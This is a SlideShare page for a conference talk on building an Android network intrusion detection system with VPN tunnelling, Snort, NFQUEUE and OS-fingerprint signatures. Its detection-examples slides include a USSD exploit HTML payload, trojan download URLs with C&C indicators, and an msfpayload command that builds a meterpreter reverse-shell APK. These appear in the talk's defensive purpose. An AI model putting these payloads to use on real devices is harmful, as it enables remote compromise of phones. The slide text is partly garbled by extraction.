SlideShare une entreprise Scribd logo

AndroIDS: Mobile Security Reloaded

Jaime Sánchez
Jaime Sánchez

This document provides an overview of building an Android intrusion detection system (IDS) to monitor network traffic on the device. It discusses setting up a VPN tunnel between the Android device and a computer to redirect all network packets from the kernel space to user space where tools like Snort can be used to analyze the traffic in real-time. It also covers ways to disguise the device operating system fingerprint through tools like OSFooler to prevent remote OS identification by scanners like Nmap. The goal is to develop a practical approach for detecting and analyzing malware and threats based on the device's network activity.

Technologie
1  sur  47
Télécharger pour lire hors ligne
ANDROIDS : MOBILE SECURITY RELOADED
ANDROIDS: MOBILE SECURITY RELOADED $"WHO"I"AM !"Passionate"about"computer"security. !"Computer"Engineering"degree"and"an"Execu7ve" MBA." !"I’m"from"Spain;"We’re"sexy"and"you"know"it. !"You"can"follow" my"adventures" at"@segofensiva" or"in"my"blog"h?p://www.seguridadofensiva.com !""Other"conferences: !"RootedCON"in"Spain !"Nuit"Du"Hack"in"Paris" !"Black"Hat"Arsenal"in"USA !"Defcon"in"USA !"... JAIME SÁNCHEZ (@SEGOFENSIVA) 2 DEEPSEC
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED MOTIVATIONS !" Smartphones" have" evolved" into" sophisGcated," compact"minicomputers !"Stores"sensiGve/private"informaGon"and"services !"Smartphones"usage"is"on"the"raise" !"SuscepGble"to"various"PCKlike"types"of"aLacks !" The" importance" of" security" mechanisms" is" not" yet"understood !"Security"mechanisms"are"not"sufficient !"Variety"of"plaOorms JAIME SÁNCHEZ (@SEGOFENSIVA) 3 DEFCON 21 DEEPSEC
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED WHY"ANDROID? !"Being"popular"is"not"always"a"good"thing. !"Mobile"malware"and"threats"are"clearly"on"the"rise. !"Over" 100" million"Android"phones" shipped"in"the"second"quarter" of"2012" alone. !""Targets"this"large"are"difficult"for"a?ackers"to"resist!" JAIME SÁNCHEZ (@SEGOFENSIVA) 4 DEFCON 21 DEEPSEC
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED THE"PLATFORM !" Android" has" inherited" powerful" base"systems"from"Linux"Kernel"such" as" the" memory" management," mulGtasking"and"file"management. !" Android" is" a" plaOorm" which" embraces" numerous" technologies" like" Linux" Kernel," C++," Java," Dalvik" VM,"etc. !" Android" has" a" processRunit" component" model" and" provides" system" func7ons" as" server" processes." For" a" funcGonal" meshKup" of" processes," it" provides"Binder. !"Why"has"a"new"mechanism"been"developed,"rather"than"using"(IPC),"such" as"sockets"and"pipes"provided"by"Linux?"It"is"because"of"performance. JAIME SÁNCHEZ (@SEGOFENSIVA) 5 DEFCON 21 DEEPSEC
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED SECURITY"ARCHITECTURE !" Android" seeks" to" be" the" most" secure" and" usable" operaGng" system" for" mobile" plaOorms" by" reKpurposing" tradiGonal" operaGng" system" security" controls"to: !"Protect"user"data !"Protect"system"resources"(including"the"network) !"Provide"applicaGon"isolaGon !"To"achieve"these"objecGves,"Android"provides"these"key"security"features: !"Robust"security"at"the"OS"level"through"the"Linux"kernel !"Mandatory"applicaGon"sandbox"for"all"applicaGons !"Secure"interprocess"communicaGon !"ApplicaGon"signing !"ApplicaGonKdefined"and"userKgranted"permissions !" Each" component" assumes" that" the" components" below" are" properly" secured. JAIME SÁNCHEZ (@SEGOFENSIVA) 6 DEFCON 21 DEEPSEC
THE"PROBLEM"? There is a massive growth in the volume of malware families and samples ... Google"Play’s"track"record"with"malware"is"not"too" good"(Bouncer"can"be"compromised)"...
THE"ONLY"PROBLEM"?
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED Android v1.0 CVE-2009-0475 (Remote code execution) CVE-2009-0606 (Privilege Escalation) CVE-2009-0607 (Multiple Integer Overflows) CVE-2009-0608 (Integer Overflow) CVE-2009-1895 (Privilege Escalation) CVE-2009-1754 (Access to Sensitive Information) CVE-2009-2348 (Access to Camera and Record Audio) CVE-2009-2656 (DoS through SMS) CVE-2009-2999 (DoS through SMS) CVE-2009-3698 (DoS through Dalvik API) CVE-2009-1185 (Privilege Escalation) CVE-2009-1186 (DoS through udev) Android v2.0 CVE-2009-1442 (Code Execution) CVE-2010-EASY (Privilege Escalation) CVE-2009-2692 (Privilege Escalation) CVE-2010-1807 (WebKitPrivilege Escalation) CVE-2010-1119 (WebKit Privilege Escalation) CVE-2011-1149 (Privilege Escalation) CVE-2011-3975 (Access to Sensitive Information) CVE-2011-2357 (Cross-Application Scripting) CVE-2011-0680 (Access to Sensitive Information) CVE-2011-2344 (Gain Privileges and Access Pictures) CVE-2011-1823 (Code Execution) JAIME SÁNCHEZ (@SEGOFENSIVA) Android v3.0 CVE-2010-4804 (Information Disclosure) CVE-2011-1823 (Privilege Escalation) CVE-2011-0640 (Code Execution) CVE-2011-1349 (DoS) CVE-2011-1350 (Privilege Escalation) CVE-2011-1352 (Privilege Escalation) CVE-2011-2343 (Access to Sensitive Information) CVE-2011-3874 (Privilege Escalation) CVE-2011-2357 (Bypass Permissions) 9 DEFCON 21 DEEPSEC
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED DIRTY"USSD Poor"SSL/TLS"implementaGons" KernelKmode"driver"exploits NFC"VulnerabiliGes Android"Master"Key ... !!!"METERPRETER"FOR" ANDROID"!!! JAIME SÁNCHEZ (@SEGOFENSIVA) 10 DEFCON 21 DEEPSEC
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED Mobile"Pwn2Own"2013 !" One" exploit" took"advantage" of" two" Chrome"on"Nexus"4"vulnerabiliGes"–" an" integer" overflow"that"affects" Chrome"and"another"Chrome" vulnerability"that"resulted"in"a"full" sandbox"escape"and"the"possibility"of"remote"code"execuGon"on"the"affected"device. !"Two"exploits"compromised"apps"that"are"installed"on"all"Samsung"Galaxy"S4"devices. JAIME SÁNCHEZ (@SEGOFENSIVA) 11 DEFCON 21 DEEPSEC
FIRST"APPROACH
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED VPN eth0:WiFi rmnet0: 3G snort tcpdump Internet gateway !"In"order"to"analyze"the"traffic"flows"we’ll"create"a"VPN"tunnel"between"our" Android"device"and"our"computer. !" The" VPN" tunnel" uses" digital" cerGficates" (public/private" key" pair)" to" authenGcate"the"client"and"the"server. !"Using"digital"cerGficates"instead"of"a"shared"key"gives"higher"flexibility,"for" instance"we"can"revoke"access"in"case"if"the"smartphone"is"lost. JAIME SÁNCHEZ (@SEGOFENSIVA) 13 DEFCON 21 DEEPSEC
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED !"Once"the"VPN"tunnel"is"established" and" the" traffic" is" being" sent" to" the" VPS," we" can" start" monitoring" the" traffic"with"snort. !" We" will" take" advantage" of" two" main"signatures:" official" rules" (the" registered" version" rules)" and" the" Emerging" Threats" (Emerging" Threats). !" We" can" also" use" tools" like" tcpdump" to" capture" traffic" for" later" analysis. !"Wireshark"gives"a"much"beLer"view"of"the"content"and"the"qualiGes" of"each"IP"datagram"or"the"TCP"segments JAIME SÁNCHEZ (@SEGOFENSIVA) 14 DEFCON 21 DEEPSEC
HELLO,"LOSER! JAIME SÁNCHEZ (@SEGOFENSIVA)
LIFE"CONTINUED
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED !" OSfooler" is" a" pracGcal" approach" presented" at" Black" Hat" Arsenal" USA" 2013. !" It" can" be" used" to" detect" and" defeat" acGve" and" passive" remote" OS" fingerprinGng"from"tools"like"nmap,"p0f"or"commercial"appliances. JAIME SÁNCHEZ (@SEGOFENSIVA) 17 DEFCON 21 DEEPSEC
FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED NMAP"INTERNAL"PROBES Fingerprint Linux 2.6.17 - 2.6.24 Class Linux | Linux | 2.6.X | general purpose SEQ(SP=A5-D5%GCD=1-6%ISR=A7-D7%TI=Z%II=I%TS=U) OPS(O1=M400C%O2=M400C%O3=M400C%O4=M400C%O5=M400C%O6=M400C) WIN(W1=8018%W2=8018%W3=8018%W4=8018%W5=8018%W6=8018) ECN(R=Y%DF=Y%T=3B-45%TG=40%W=8018%O=M400C%CC=N%Q=) T1(R=Y%DF=Y%T=3B-45%TG=40%S=O%A=S+%F=AS%RD=0%Q=) T2(R=N) T3(R=Y%DF=Y%T=3B-45%TG=40%W=8018%S=O%A=S+%F=AS%O=M400C%RD=0%Q=) T4(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=) T5(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) T6(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=) T7(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) U1(DF=N%T=3B-45%TG=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G) IE(DFI=N%T=3B-45%TG=40%CD=S) Most"important: !"TCP"ISN"greatest"common"divisor"(GDC) !"TCP"IP"ID"sequence"generaGon"alg"(TI) !"TCP"Gmestamp"opGon"alg"(TS) !"TCP"OpGons"(O,"O1RO6) !"TCP"iniGal"Window"Size"(W,"W1RW6) !"Responsiveness"(R) !"IP"don’t"fragment"bit"(DF) !"IP"iniGal"GmeKtoKlive"guess"(TG) JAIME SÁNCHEZ (@SEGOFENSIVA) Although"there"are"others: !"TCP"ISN"counter"rate"(ISR) !"ICMP"IP"ID"sequence"generaGon"alg"(II) !"Shared"IP"ID"sequence"Boolean"(SS) !"Don’t"Fragment"ICMP"(DFI) !"Explicit"congesGon"noGficaGon"(C) !"TCP"miscellaneous"quirks"(Q) !"TCP"sequence"number"(S) !"etc. 18 NUIT DU HACK 2013 DEEPSEC
OSFOOLER: REMOTEMOBILE SECURITY RELOADED FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven ... SPACE TO USER OVER ANDROIDS: OS FINGERPRINTING ISHEAVEN P0F"SIGNATURES 8192:32:1:48:M*,N,N,S:.:Windows:98 Opera&ng)System ""K"Family ""K"Version Packet) Size Quirks """K"Data"in"SYN"packets """K"OpGons"arer"EOL """K"IP"ID"Field"="0 """K"ACK"different"to"0 """K"Unusual"flags """K"Incorrect"opGons"decode DF)Bit) Ini&al)TTL TCP)op&ons)and)order Window)Size """K"N:"NOP """K"E:"EOL """K"Wnnn:"WS """K"Mnnn:"MSS """K"S:"SACK """K"T"/"T0:"Timestamp"" """K"?n """K"*"Any"value """K"%nnn"nnn"MulGple """K"Sxx"MSS"MulGple """K"Txx"MTU"MulGple """K"xxx"Constant"value JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) 16 19 NUIT DU HACK 2013 2013 BLACKHAT ARSENAL USA DEEPSEC
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED !" I" need" to" process" traffic" before" being"processed"inside"my"Android" device. !" I" can"redirect"all" network" packet" from"Kernel"Space"to"User"Space !"I"can"do"whatever"I"want"with"the" packets !"This"is"done"in"RealR7me. !" Runs" conGnuously" without" h u m a n" s u p e r v i s i o n" a n d" i s" completely"transparent"for"user. JAIME SÁNCHEZ (@SEGOFENSIVA) 20 DEFCON 21 DEEPSEC
I’VE"GOT"IT"!
FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED !"Computer"operaGng"systems"provide" different"levels"of"access"to"resources. Ring"3 !"This"is"generally"hardwareKenforced"by" some"CPU"architectures"hat"provide" different"CPU"modes"at"the"hardware"or" microcode"level. Ring"2 Ring"1 Ring"0 Kernel !"Rings"are"arranged"in"a"hierarchy"from" most"privileged"(most"trusted,"usually" numbered"zero)"to"least"privileged"(least" trusted). Devices Devices Devices Less Privileged JAIME SÁNCHEZ (@SEGOFENSIVA) More Privileged !"On"most"operaGng"systems,"RING"0"is" the"level"with"the"most"privileges"and" interacts"most"directly"with"the"physical" hardware"such"as"the"CPU"and"memory. 22 NUIT DU HACK 2013 DEEPSEC
FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED KERNEL"vs"USER"SPACE KERNEL"SPACE USER"SPACE KERNEL"SPACE)is)strictly)reserved)for)running)the)kernel,)kernel)extensions,)and)most)device) drivers.)In)contrast,)user) space)is)the)memory) area)where)all)user)mode)applica&ons)work) and)this)memory)can)be)swapped)out)when)necessary. Similarly,) the) term) USER" LAND) refers) to) all) applica&on) soKware) that) runs) in) user) space.) Userland)usually)refers)to)the)various)programs)and)libraries)that)the)opera&ng)system)uses) to)interact)with)the)kernel:) soKware) that) performs)input/output,) manipulates) file) system,) objects,)etc. JAIME SÁNCHEZ (@SEGOFENSIVA) 23 NUIT DU HACK 2013 DEEPSEC
FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED WTF"!? JAIME SÁNCHEZ (@SEGOFENSIVA) 24 NUIT DU HACK 2013 DEEPSEC
OSFOOLER: REMOTEMOBILE SECURITY RELOADED From"kernel"Space"to"user"Heaven How"i"met"your"packet ANDROIDS: OS FINGERPRINTING IS OVER ... APPLICATION USER"SPACE read() TCP"recv"Buffer TCP"Process KERNEL"SPACE tcp_v4_rcv() Socket Backlog IP"Layer Pointer"to Device NIC ip_rcv() sorirq Internal Memory Packet"Data Interrupt Handler Poll"List Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory Incoming"Packet JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) BLACKHAT ARSENAL USA 2013 DEEPSEC
OSFOOLER: REMOTEMOBILE SECURITY RELOADED FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven ... SPACE TO USER OVER ANDROIDS: OS FINGERPRINTING ISHEAVEN USER"SPACE APPLICATION read() TCP"recv"Buffer TCP"Process KERNEL"SPACE CONNTRACK Inbound"Packets MANGLE Socket Backlog PREROUTING FORWARD ip_rcv() IP"Layer forwarded"and"accepted"packets Pointer"to Device locally"desGned"packets"must"pass"the" INPUT"chains"to"reach"listening"sockets tcp_v4_rcv() FILTER NIC INPUT sorirq forwarded" packets Memory Kernel local packets Packet"Data Interrupt Handler Poll"List ConGnue"Processing Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) Incoming"Packet 27 NUIT DU HACK 2013 2013 BLACKHAT ARSENAL USA DEEPSEC
OSFOOLER: REMOTEMOBILE SECURITY RELOADED From"kernel"Space"to"user"Heaven How"i"met"your"packet ANDROIDS: OS FINGERPRINTING IS OVER ... APPLICATION USER"SPACE read() TCP"recv"Buffer TCP"Process KERNEL"SPACE tcp_v4_rcv() Socket Backlog IP"Layer Pointer"to Device NIC ip_rcv() sorirq Memory Kernel Packet"Data Interrupt Handler Poll"List Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory Incoming"Packet JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) BLACKHAT ARSENAL USA 2013 DEEPSEC
OSFOOLER: REMOTEMOBILE SECURITY RELOADED From"kernel"Space"to"user"Heaven How"i"met"your"packet ANDROIDS: OS FINGERPRINTING IS OVER ... APPLICATION USER"SPACE read() TCP"recv"Buffer TCP"Process KERNEL"SPACE tcp_v4_rcv() Socket Backlog IP"Layer Pointer"to Device NIC ip_rcv() sorirq Memory Kernel Packet"Data Interrupt Handler Poll"List Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory Incoming"Packet JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) BLACKHAT ARSENAL USA 2013 DEEPSEC
FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED IPTABLES )A)target"extension"consists"of"a"KERNEL"MODULE,)and)an)op&onal)extension)to)iptables)to) provide)new)command)line)op&ons. There)are)several)extensions)in)the)default)NeRilter)distribu&on: JAIME SÁNCHEZ (@SEGOFENSIVA) 30 NUIT DU HACK 2013 DEEPSEC
FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED QUEUE !)QUEUE)is)an)iptables)and)ip6tables)target)which)which)queues"the"packet"for"userspace" processing. !)For)this)to)be)useful,)two)further)components)are)required: • a)QUEUE"HANDLER)which)deals)with)the)actual)mechanics)of)passing)packets)between) the)kernel)and)userspace;)and • a)USERSPACE"APPLICATION)to)receive,)possibly)manipulate,)and)issue)verdicts)on) packets. !)The)default)value)for)the)maximum)queue)length)is)1024.)Once)this)limit)is)reached,)new) packets)will)be)dropped)un&l)the)length)of)the)queue)falls)below)the)limit)again.) $ iptables -A INPUT -j NFQUEUE --queue-num 0 JAIME SÁNCHEZ (@SEGOFENSIVA) 31 13 NUIT DU HACK 2013 DEEPSEC
ANDROIDS
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED The"logo"should"look"like"... JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED PLEASE!"don't"make"decisions"at" night"in"Las"Vegas JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED ANDROIDS !" Create" a" serious" open" source" networkKbased" intrusion" detecGon" system"(IDS)"and"networkKbased"intrusion"protecGon"system""(IPS)"has" the" ability" to"perform"realKGme" traffic"analysis"and" packet" logging" on" Internet"Protocol"(IP)"networks: !"It"should"feature: !"Protocol"analysis !"Content"searching !"Content"matching JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED IDS"ARCHITECTURE:"SENSOR !" Runs" conGnuously" and" without" human" supervision,"featuring: !"Analyze"traffic !" Send"push"alerts" to"the" Android"device" in"order"to"warn"the"user"about"the"threat !"Report"to"Logging"Server"Custom !"Deploy"some"reacGve"acGons: !"Drop"specific"packet !"Add"new"rule"in"iptables"firewall !"Launch"script"/"module !" Sync" aLack" signatures" to" keep" them" updated. !"It"should"impose"minimal"overhead. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED IDS"ARCHITECTURE:"SERVER Web Interface Android Device Internet Firewall IDS"Server"& Database !" The" server" is" running" inside" a" Linux" Box," and" is" receiving" all" the" messages"the"Android"sensor"is"sending. !"Server"is"responsible"for: !"Send"signatures"to"remote"devices !"Store"events"in"database !"Detects"staGsGcal"anomalies"&"analysis"realKGme. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED MAYBE"ONE"DAY"... !" CollaboraGve" detecGon" and" detecGon" of" malware" propagaGon" paLerns"across"a"community"of"mobile"devices !"Evaluate"various"detecGon"algorithms !"Alert"about"a"detected"anomaly"when"it"persists !"More"reacGve"acGons: !"Uninstall"suspicious"applicaGon !"Kill"process !"Disconnect"radios !"Encrypt"data !"Monitor"system"calls"in"realKGme JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED PROTOCOL"ANALYSIS LOOKS"LIKE"I"PICKED"THE"WRONG"WEEK TO"QUIT"SNIFFING"PACKETS JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED " !"Packet"with"FIN,"SYN,"PUSH"and"URG"flags"acGve." !"Report"to"the"Central"Logger"and"DROP"the"packet. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED REMOTE"OS"FINGERPRINTING !"Detect"and"drop"packet"sent"from"wellKknown"scanning"tools. !"nmap"OS"fingerprinGng"works"by"sending"up"to"16"TCP,"UDP,"and"ICMP"probes" to"known"open"and"closed"ports"of"the"target"machine. SEQUENCE"GENERATION"(SEQ,"OPS,"WIN"&"T1) ICMP"ECHO"(IE) TCP"EXPLICIT"CONGESTION"NOTIFICATION"(ECN) TCP"T2RT7 UDP JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED PATTERN"MATCHING I’M"WATCHING"YOU... JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED SIGNATURE"FORMAT !"With"the"help"of"custom"build"signatures,"the"framework"can"also"be" used"to"detect"probes"or"aLacks"designed"for"mobile"devices " !"Useful"signatures"from"Snort"and"Emerging"Threats !"Convert"snortKlike"rules"to"a"friendly"format: JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
MORE"EXAMPLES"!
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED Android"2.0"USERAFTERRFREE"REMOTE"CODE"EXECUTION !) Does)not)properly)validate) floa&ngpoint)data,) which)allows)remote) a]ackers) to)execute) arbitrary)code)or)cause)a)denial)of)service. !)Executed)via)craKed)HTML)document. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED USSD"EXPLOIT !"A" USSD" code" is"entered"into"phones" to"perform" acGons. !" They" are" mainly" used" by" network" operators" to" provide" customers" with" easy" access" to" preK configured"services,"including: !"callKforwarding !"balance"inquiries !"mulGple"SIM"funcGons. !"The"HTML"code"to"execute"such"an"acGon"is"as"follows: <a#href="tel:xyz">Click#here#to#call</a> !"Example"exploit: <frameset>#<frame#src="tel:*2767*3855#"#/>#</#frameset> JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED MALWARE !"ANDR.TROJAN.SMSSEND !"Download"from: !"hxxp://adobeflashplayerEup.ru/?a=RANDOM_CHARACTERS"–"93.170.107.184" !"hxxp://googleplaynew.ru/?a=RANDOM_CHARACTERS"–"93.170.107.184 !"hxxp://browsernewEupdate.ru/?a=RANDOM_CHARACTERS"–"93.170.107.184 !"Once"executed,"connect"to"C&C:""gaga01.net/rq.php !oard=unknown;brand=generic;device=generic;imei=XXXXXX;imsi=XXXXXX;session_i d=1;operator=XXX;sms0=XXXXXX;sms1=XXXXXX;sms2=XXXXXX;]me=XXXXXX;]mezo ne=XXXXXX !"Search"paLern:"rq.php !"METERPRETER !""It"features"command"history,"tab"compleGon," channels,"and"more. !"Let’s"try: $#msfpayload#android/meterpreter/reverse_tcp#LHOST=192.168.0.20#R#>#meter.apk $#file#meter.apk# ###meter.apk:#Zip#archive#data,#at#least#v2.0#to#extract JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
T H A N K Y O U! JAIME SÁNCHEZ (@SEGOFENSIVA) JSANCHEZ@SEGURIDADOFENSIVA.COM

Recommandé

Hackers software
Hackers softwareHackers software
Hackers softwareSwati Sharma
 
Hacking Roman Codes with Mobile Phones
Hacking Roman Codes with Mobile PhonesHacking Roman Codes with Mobile Phones
Hacking Roman Codes with Mobile PhonesDavid Rogers
 
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...viaForensics
 
Stealth servers need Stealth Packets - Derbycon 3.0
Stealth servers need Stealth Packets - Derbycon 3.0Stealth servers need Stealth Packets - Derbycon 3.0
Stealth servers need Stealth Packets - Derbycon 3.0Jaime Sánchez
 
From Kernel Space to User Heaven
From Kernel Space to User HeavenFrom Kernel Space to User Heaven
From Kernel Space to User HeavenJaime Sánchez
 
From Kernel Space to User Heaven #NDH2k13
From Kernel Space to User Heaven #NDH2k13From Kernel Space to User Heaven #NDH2k13
From Kernel Space to User Heaven #NDH2k13Jaime Sánchez
 
Plataformas de mensajería y riesgos asociados: caso WhatsApp
Plataformas de mensajería y riesgos asociados: caso WhatsAppPlataformas de mensajería y riesgos asociados: caso WhatsApp
Plataformas de mensajería y riesgos asociados: caso WhatsAppJaime Sánchez
 
Whatsapp: mentiras y cintas de video RootedCON 2014
Whatsapp: mentiras y cintas de video RootedCON 2014Whatsapp: mentiras y cintas de video RootedCON 2014
Whatsapp: mentiras y cintas de video RootedCON 2014Jaime Sánchez
 

Recommandé

Hackers software
Hackers softwareHackers software
Hackers softwareSwati Sharma
 
Hacking Roman Codes with Mobile Phones
Hacking Roman Codes with Mobile PhonesHacking Roman Codes with Mobile Phones
Hacking Roman Codes with Mobile PhonesDavid Rogers
 
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...viaForensics
 
Stealth servers need Stealth Packets - Derbycon 3.0
Stealth servers need Stealth Packets - Derbycon 3.0Stealth servers need Stealth Packets - Derbycon 3.0
Stealth servers need Stealth Packets - Derbycon 3.0Jaime Sánchez
 
From Kernel Space to User Heaven
From Kernel Space to User HeavenFrom Kernel Space to User Heaven
From Kernel Space to User HeavenJaime Sánchez
 
From Kernel Space to User Heaven #NDH2k13
From Kernel Space to User Heaven #NDH2k13From Kernel Space to User Heaven #NDH2k13
From Kernel Space to User Heaven #NDH2k13Jaime Sánchez
 
Plataformas de mensajería y riesgos asociados: caso WhatsApp
Plataformas de mensajería y riesgos asociados: caso WhatsAppPlataformas de mensajería y riesgos asociados: caso WhatsApp
Plataformas de mensajería y riesgos asociados: caso WhatsAppJaime Sánchez
 
Whatsapp: mentiras y cintas de video RootedCON 2014
Whatsapp: mentiras y cintas de video RootedCON 2014Whatsapp: mentiras y cintas de video RootedCON 2014
Whatsapp: mentiras y cintas de video RootedCON 2014Jaime Sánchez
 
Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...
Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...
Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...Jaime Sánchez
 
Defeating WhatsApp’s Lack of Privacy
Defeating WhatsApp’s Lack of PrivacyDefeating WhatsApp’s Lack of Privacy
Defeating WhatsApp’s Lack of PrivacyJaime Sánchez
 
Mobile security
Mobile securityMobile security
Mobile securityhome
 
Mobile security
Mobile securityMobile security
Mobile securityBasant Kumar
 
ศิลปินในดวงใจ
ศิลปินในดวงใจศิลปินในดวงใจ
ศิลปินในดวงใจicesmurf
 
SIEM brochure A4 8pp FINAL WEB
SIEM brochure A4 8pp FINAL WEBSIEM brochure A4 8pp FINAL WEB
SIEM brochure A4 8pp FINAL WEBMerlin Govender
 
Deutsche Telekom Partnering Operating Alliance Summit - Zimperium
Deutsche Telekom Partnering Operating Alliance Summit - ZimperiumDeutsche Telekom Partnering Operating Alliance Summit - Zimperium
Deutsche Telekom Partnering Operating Alliance Summit - ZimperiumZimperium
 
Security As A Service
Security As A ServiceSecurity As A Service
Security As A Serviceguest536dd0e
 
How to Gather Global Mobile Threat Intelligence
How to Gather Global Mobile Threat IntelligenceHow to Gather Global Mobile Threat Intelligence
How to Gather Global Mobile Threat IntelligenceZimperium
 
Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...
Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...
Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...CA API Management
 
Zimperium - Technology Briefing
Zimperium - Technology BriefingZimperium - Technology Briefing
